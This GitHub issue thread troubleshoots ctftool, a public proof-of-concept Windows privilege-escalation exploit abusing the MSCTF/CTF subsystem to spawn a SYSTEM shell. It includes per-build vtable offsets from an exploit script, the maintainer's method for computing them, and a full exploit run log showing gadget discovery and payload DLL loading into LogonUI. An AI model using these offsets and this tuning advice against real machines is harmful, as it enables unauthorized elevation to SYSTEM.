Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

No cmd spawned on Win 10 Enterprise 1809 #9

Open
mattwhatkins opened this issue Aug 14, 2019 · 13 comments
Open

No cmd spawned on Win 10 Enterprise 1809 #9

mattwhatkins opened this issue Aug 14, 2019 · 13 comments

Comments

@mattwhatkins
Copy link

I'm experimenting with this in a corporate environment, but I can't seem to get a cmd shell spawned. Apologies if I'm missing something trivial.

Host is a Win10 VM Enterprise 1809 running in VMWare. Latest updates are from the 6th July.

Testing with the ctf-consent-system.ctf, ctf-exploit-common-win10.ctf and ctf-logonui-system.ctf fails to result in a shell being spawned, yet the output shows Exploit complete. Checking process explorer, there are no new cmd.exe processes running in other sessions/hidden.

Is this expected to work or am I missing something? What's the best way to go about debugging this?

@cloudsbyzeus
Copy link

Having the same experience with this.

@KillaEslieBee
Copy link

On a testmachine i had the same problem. I editted the ctf-exploit-common-win10.ctf
and in my case the offset (not certain if i used the correct term for it!) used for 1903 also worked for my test machine. So i replaced the offset with the offset from 1903 -> 480 and replaced it in the rightspot. Saved the file and now the stuff is working.

If it doesnt work try tinkering with that value for your build, for my 1803 offset 480 worked perfectly.

set r0 1903
eq r0 regval
repeat r0 set r3 480

set r0 1809
eq r0 regval
repeat r0 set r3 496

set r0 1803
eq r0 regval
repeat r0 set r3 480

set r0 1709
eq r0 regval
repeat r0 set r3 452

set r0 1703
eq r0 regval
repeat r0 set r3 401

@taviso
Copy link
Owner

taviso commented Aug 15, 2019

Thanks for the bug report, can you paste the output you see?

Also, can you find the version of MSCTF.DLL?

I did test it on 1809, but it might be a different patchlevel I didn't check...

@cloudsbyzeus
Copy link

HI @KillaEslieBee @taviso

I am also testing with 1809, and I tried different values with no success. What is your recommendation to identify what is the correct value to use here?

@taviso
Copy link
Owner

taviso commented Aug 15, 2019

If you tell me the version of MSCTF.DLL you have, I can check.

@cloudsbyzeus
Copy link

@taviso, version is 10.0.17763.529

@taviso
Copy link
Owner

taviso commented Aug 15, 2019

I just took a look at that version, the correct offset is 496 - which should be automatically matched to 1809.

(To find the offset, I just subtract the pointer to CTIPProxy::Reconvert in the CTIPProxy vtable from the base of the CStubIEnumTfInputProcessorProfiles::_StubTbl, and divide by 8).

Can you show the full output from the exploit, it must be some other problem.

@cloudsbyzeus
Copy link

Microsoft Defender just caught it as:
HackTool:Win32/CTFExtool

@cloudsbyzeus
Copy link

An interactive ctf exploration tool by @taviso.
Type "help" for available commands.
Most commands require a connection, see "help connect".
ctf> connect
The ctf server port is located at \BaseNamedObjects\msctf.serverDefault3
NtAlpcConnectPort("\BaseNamedObjects\msctf.serverDefault3") => 0
Connected to CTF server@\BaseNamedObjects\msctf.serverDefault3, Handle 00000224
ctf> scan
Client 0, Tid 16156 (Flags 0x08, Hwnd 00003F1C, Pid 12924, explorer.exe)
Client 1, Tid 3140 (Flags 0x08, Hwnd 00000C44, Pid 12924, explorer.exe)
Client 2, Tid 14272 (Flags 0x08, Hwnd 000037C0, Pid 12924, explorer.exe)
Client 3, Tid 3908 (Flags 0x08, Hwnd 00000F44, Pid 12924, explorer.exe)
Client 4, Tid 9076 (Flags 0x08, Hwnd 00002374, Pid 12924, explorer.exe)
Client 5, Tid 248 (Flags 0x0c, Hwnd 000000F8, Pid 12924, explorer.exe)
Client 6, Tid 3408 (Flags 0x08, Hwnd 00000D50, Pid 12924, explorer.exe)
Client 7, Tid 9408 (Flags 0x08, Hwnd 000024C0, Pid 12924, explorer.exe)
Client 8, Tid 7472 (Flags 0x08, Hwnd 00001D30, Pid 12924, explorer.exe)
Client 9, Tid 5828 (Flags 0x08, Hwnd 000016C4, Pid 12924, explorer.exe)
Client 10, Tid 9376 (Flags 0x08, Hwnd 000024A0, Pid 12924, explorer.exe)
Client 11, Tid 15456 (Flags 0x0c, Hwnd 00003C60, Pid 9872, ShellExperienceHost.exe)
Client 12, Tid 1272 (Flags 0x0c, Hwnd 000004F8, Pid 908, SearchUI.exe)
Client 13, Tid 1128 (Flags 0x0c, Hwnd 00000468, Pid 908, SearchUI.exe)
Client 14, Tid 12252 (Flags 0x08, Hwnd 00002FDC, Pid 10216, ApplicationFrameHost.exe)
Client 15, Tid 7620 (Flags 0x08, Hwnd 00001DC4, Pid 10216, ApplicationFrameHost.exe)
Client 16, Tid 11020 (Flags 0x0c, Hwnd 00002B0C, Pid 16600, MicrosoftEdge.exe)
Client 17, Tid 7792 (Flags 0x0c, Hwnd 00001E70, Pid 6892, MicrosoftEdgeCP.exe)
Client 18, Tid 3712 (Flags 0000, Hwnd 00000E80, Pid 13328, ctfmon.exe)
Client 19, Tid 572 (Flags 0x08, Hwnd 0000023C, Pid 5152, FF_Protection.exe)
Client 20, Tid 7504 (Flags 0x08, Hwnd 00001D50, Pid 14036, OneDrive.exe)
Client 21, Tid 12616 (Flags 0x0c, Hwnd 00003148, Pid 212, LockApp.exe)
Client 22, Tid 2216 (Flags 0x08, Hwnd 000008A8, Pid 9704, Taskmgr.exe)
Client 23, Tid 13516 (Flags 0x08, Hwnd 000034CC, Pid 4828, regedit.exe)
Client 24, Tid 12140 (Flags 0x0c, Hwnd 00002F6C, Pid 10984, SecHealthUI.exe)
Client 25, Tid 10924 (Flags 0x0c, Hwnd 00002AAC, Pid 15200, MicrosoftEdgeCP.exe)
Client 26, Tid 9144 (Flags 0000, Hwnd 000023B8, Pid 7748, ctftool.exe)
Client 27, Tid 13204 (Flags 0x08, Hwnd 00003394, Pid 7436, conhost.exe)
ctf> script .\scripts\ctf-logonui-system.ctf
Attempting to copy exploit payload...
Overwrite C:\TEMP\EXPLOIT.DLL (Yes/No/All)? a
C:payload64.dll
1 File(s) copied
The screen will lock to trigger the login screen in 5 seconds...
Closing existing ALPC Port Handle 00000224...
The ctf server port is located at \BaseNamedObjects\msctf.serverWinlogon3
Connected to CTF server@\BaseNamedObjects\msctf.serverWinlogon3, Handle 0000023C
Client 0, Tid 9144 (Flags 0000, Hwnd 000023B8, Pid 7748, ctftool.exe)
Client 1, Tid 11904 (Flags 0x1000000c, Hwnd 00002E80, Pid 15592, LogonUI.exe)
Found new client LogonUI.exe, DefaultThread now 11904
ReleaseId is 1809
Guessed msvcrt => C:\Windows\system32\msvcrt.DLL
Found Gadget 48895C... in module msvcrt at offset 0x31140
C:\Windows\system32\msvcrt.DLL->.text->VirtualAddress is 0x001000
C:\Windows\system32\msvcrt.DLL->.text->PointerToRawData is 0x000400
C:\Windows\system32\kernel32.DLL->.data->VirtualAddress is 0x0a9000
Command succeeded, stub created
Dumping Marshal Parameter 3 (Base 000E04F0, Type 0x106, Size 0x18, Offset 0x40)
000000: 4d e7 c6 71 28 0f d8 11 a8 2a 00 06 5b 84 43 5c M..q(....*..[.C
000010: 01 00 00 00 dc ff 65 4e ......eN
Marshalled Value 3, COM {71C6E74D-0F28-11D8-A82A-00065B84435C}, ID 1, Timestamp 0x4e65ffdc
0x7ffe32320000
0x7ffe2f640000
0x7ffe30240000
Guessed msctf => C:\Windows\system32\msctf.DLL
Found Gadget 488b41... in module msctf at offset 0xb9cc0
C:\Windows\system32\msctf.DLL->.text->VirtualAddress is 0x001000
C:\Windows\system32\msctf.DLL->.text->PointerToRawData is 0x000400
0x7ffe2f640000
Guessed kernel32 => C:\Windows\system32\kernel32.DLL
C:\Windows\system32\kernel32.DLL is a 64bit module.
kernel32!LoadLibraryA@0x180000000+0x1f220
The CFG call chain is built, writing in parameters...
Writing in the payload path "C:\WINDOWS\TEMP\EXPLOIT.DLL"...
0x7ffe30740000
Guessed combase => C:\Windows\system32\combase.DLL
Found Gadget 488b49... in module combase at offset 0x1eaac0
C:\Windows\system32\combase.DLL->.text->VirtualAddress is 0x001000
C:\Windows\system32\combase.DLL->.text->PointerToRawData is 0x000400
Payload created and call chain ready, get ready...

Exploit complete.

ctf>

@taviso
Copy link
Owner

taviso commented Aug 15, 2019

Hmmm... it looks okay, can you try using script .\scripts\ctf-consent-system.ctf script instead?

The only thing I can think of is there are some group policy settings that change how the loginui one works.

@jgrotter
Copy link

Microsoft Defender just caught it as:
HackTool:Win32/CTFExtool

+1 - MS Security just started flagging/deleting

@cloudsbyzeus
Copy link

Hmmm... it looks okay, can you try using script .\scripts\ctf-consent-system.ctf script instead?

The only thing I can think of is there are some group policy settings that change how the loginui one works.

Yes in both cases a cmd is not spawned. Its a default install. Don't think it has anything special.

@Knallkoppon
Copy link

I'm on Windows 10 Enterprise 1709. Doesn't work. I think it is caused by the Extended Support of the Enterprise Versions. My MSCTF.DLL is on version 10.0.16299.696. I didn't understand how to calc the offset.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

6 participants